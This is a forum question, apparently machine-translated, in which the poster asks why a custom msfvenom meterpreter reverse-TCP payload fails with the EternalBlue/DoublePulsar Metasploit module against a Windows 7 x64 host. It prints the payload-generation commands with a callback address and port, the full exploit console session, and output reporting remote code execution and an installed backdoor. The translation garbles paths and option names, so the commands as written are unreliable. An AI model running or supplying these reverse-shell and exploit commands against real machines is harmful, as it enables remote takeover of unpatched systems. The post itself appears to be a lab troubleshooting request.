exploit – Generic / custom load of Metasploit

I have generated a custom payload using msfvenom as such (First I want to try with the simplest custom payload, without encoder or anything):

msfvenom -p windows / x64 / meterpreter / reverse_tcp LHOST = 192.168.1.117 LPORT = 4444 -f exe -o payload.exe

and I've also made a ruby ​​version (I thought the size might have something to do with that):

msfvenom -p windows / x64 / meterpreter / reverse_tcp LHOST = 192.168.1.117 LPORT = 4444 -f ruby ​​-o payload.rb

My objective is Windows 7 Ultimate x64.

I am using the windows / smb / eternalblue_doublepulsar It explodes and until now it has never failed me.

These are some side questions I have:

  • What is it PAYLOADSTR and how do I use it?
  • Is the /root/ before the name of the necessary file? (I get the same result and without it)

Here is my intent and the exit:

msf exploit (windows / smb / eternalblue_doublepulsar)> set payload generic / custom
payload => generic / custom
MSF exploit (windows / smb / eternalblue_doublepulsar)> set payloadfile /root/payload.exe
payloadfile => /root/payload.exe
MSF exploit (windows / smb / eternalblue_doublepulsar)> exploit 

[-] 192.168.1.102:445 - Exploitation failure: no encoder encoded the buffer successfully.
[*] Exploitation completed, but no session was created.
msf exploit (windows / smb / eternalblue_doublepulsar)> set payloadstr C: \
payloadstr => C: 
MSF exploit (windows / smb / eternalblue_doublepulsar)> exploit 

[*] 192.168.1.102:445 - Generating XML data from Eternalblue
[*] 192.168.1.102:445 - Generating Doublepulsar XML data
[*] 192.168.1.102:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.102:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.102:445 - Launch of Eternalblue ...
000f: err: service: process_send_command receiving the timeout of the command output
[+] 192.168.1.102:445 - Backdoor is already installed
[*] 192.168.1.102:445 - Launch of Doublepulsar ...
000f: err: service: process_send_command receiving the timeout of the command output
Error sending the wrong architecture to the destination
[+] 192.168.1.102:445 - Remote code executed ... 3 ... 2 ... 1 ...
[*] Exploitation completed, but no session was created.
MSF exploit (windows / smb / eternalblue_doublepulsar)> set payloadstr C: \ payload.exe
payloadstr => C:  payload.exe
MSF exploit (windows / smb / eternalblue_doublepulsar)> exploit 

[*] 192.168.1.102:445 - Generating XML data from Eternalblue
[*] 192.168.1.102:445 - Generating Doublepulsar XML data
[*] 192.168.1.102:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.102:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.102:445 - Launch of Eternalblue ...
000f: err: service: process_send_command receiving the timeout of the command output
[+] 192.168.1.102:445 - Backdoor is already installed
[*] 192.168.1.102:445 - Launch of Doublepulsar ...
000f: err: service: process_send_command receiving the timeout of the command output
Error sending the wrong architecture to the destination
[+] 192.168.1.102:445 - Remote code executed ... 3 ... 2 ... 1 ...
[*] Exploitation completed, but no session was created.

MSF exploit (windows / smb / eternalblue_doublepulsar)> show options

Module options (exploit / windows / smb / eternalblue_doublepulsar):

Name Current configuration required Description
---- --------------- -------- -----------
DOUBLEPULSARPATH / root / Eternalblue-Doublepulsar-Metasploit / deps / yes Doublepulsar path directory
ETERNALBLUEPATH / root / Eternalblue-Doublepulsar-Metasploit / deps / yes Eternalblue path directory
PROCESSINJECT explorer.exe yes Name of the process to be injected (Change to lsass.exe for x64)
RHOST 192.168.1.102 yes The destination address
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x64 yes Destination architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c route


Payload options (generic / customized):

Name Current configuration required Description
---- --------------- -------- -----------
PAYLOADFILE /root/payload.exe not The file to read the payload of
PAYLOADSTR C:  payload.exe no The string to use as a payload


Exploit the goal:

Id Name
- ----
8 Windows 7 (all services) (x86) (x64)

I've searched everywhere, but I could not find a solution, so, as a last hope, I'm posting a question here.
Any help is appreciated.